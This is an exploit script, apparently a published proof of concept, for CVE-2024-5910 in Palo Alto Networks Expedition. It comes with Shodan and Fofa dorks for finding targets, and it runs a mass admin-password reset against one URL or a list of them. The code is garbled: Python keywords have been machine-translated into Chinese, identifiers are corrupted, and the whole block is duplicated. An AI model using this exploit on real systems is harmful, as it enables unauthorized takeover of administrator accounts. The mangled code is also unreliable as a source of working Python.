##########
##############################
#-利用标题:管理员帐户的POC重置Palo Alto Networks Expedition工具#
#-Shodan Dork: html:'expedition项目'#
#-Fofa Dork:'探险项目'icon_hash='1499876150'#
#-利用作者: bittehunter#
#-电子邮件:[email protected]##
# - 脆弱版本: 1.2 1.2.92#
# - 在: 1.2.90.1 1.2.75#测试
#-CVE : CVE-2024-5910#
##############################
##########
导入请求
导入argparse
进口警告
从requests.packages.urllib3.ceptions导入InsecureRequestWarning
警告。Simplefilter(“忽略”,InsecureReRequestWarning)
endpoint='/os/startup/restore/restoreadmin.php'
def send_request(base_url):
url=f'{base_url} {endpoint}'
打印(ftesting url: {url}')
TRY:
响应=requests.get(url,verify=false,timeout=7)
if antsphy.status_code==200:
打印('Admin密码还原为:'Paloalto'\ n')
print('管理面板现在可以通过==admin
aloalto Credits访问)
其他:
print(f'request失败了状态code: {response.status_code} \ n')
除了requests.exceptions.requestexception为e:
打印(f'Error将请求发送到{url}')#{e}
def main():
parser=argparse.argumentparser(Description='Palo Alto Expedition-管理员帐户密码重置POC')
parser.add_argument(' - u',' - url',type=str,help='单个目标url')
parser.add_argument(' - l',' - list',type=str,help='url目标列表')
args=parser.parse_args()
如果args.url:
send_request(args.url)
elif args.list:
TRY:
用file:开放(args.list,'r')
urls=file.readlines()
对于urls:中的base_url
send_request(base_url.strip())
除了FilenotFoundError:
打印(未找到f'file: {args.list}')
其他:
打印(“我需要一个带有-u的URL地址或带有-l的URL文件列表。”)
如果name=='__ -Main __':
主要的()
##############################
#-利用标题:管理员帐户的POC重置Palo Alto Networks Expedition工具#
#-Shodan Dork: html:'expedition项目'#
#-Fofa Dork:'探险项目'icon_hash='1499876150'#
#-利用作者: bittehunter#
#-电子邮件:[email protected]##
# - 脆弱版本: 1.2 1.2.92#
# - 在: 1.2.90.1 1.2.75#测试
#-CVE : CVE-2024-5910#
##############################
##########
导入请求
导入argparse
进口警告
从requests.packages.urllib3.ceptions导入InsecureRequestWarning
警告。Simplefilter(“忽略”,InsecureReRequestWarning)
endpoint='/os/startup/restore/restoreadmin.php'
def send_request(base_url):
url=f'{base_url} {endpoint}'
打印(ftesting url: {url}')
TRY:
响应=requests.get(url,verify=false,timeout=7)
if antsphy.status_code==200:
打印('Admin密码还原为:'Paloalto'\ n')
print('管理面板现在可以通过==admin
aloalto Credits访问)其他:
print(f'request失败了状态code: {response.status_code} \ n')
除了requests.exceptions.requestexception为e:
打印(f'Error将请求发送到{url}')#{e}
def main():
parser=argparse.argumentparser(Description='Palo Alto Expedition-管理员帐户密码重置POC')
parser.add_argument(' - u',' - url',type=str,help='单个目标url')
parser.add_argument(' - l',' - list',type=str,help='url目标列表')
args=parser.parse_args()
如果args.url:
send_request(args.url)
elif args.list:
TRY:
用file:开放(args.list,'r')
urls=file.readlines()
对于urls:中的base_url
send_request(base_url.strip())
除了FilenotFoundError:
打印(未找到f'file: {args.list}')
其他:
打印(“我需要一个带有-u的URL地址或带有-l的URL文件列表。”)
如果name=='__ -Main __':
主要的()
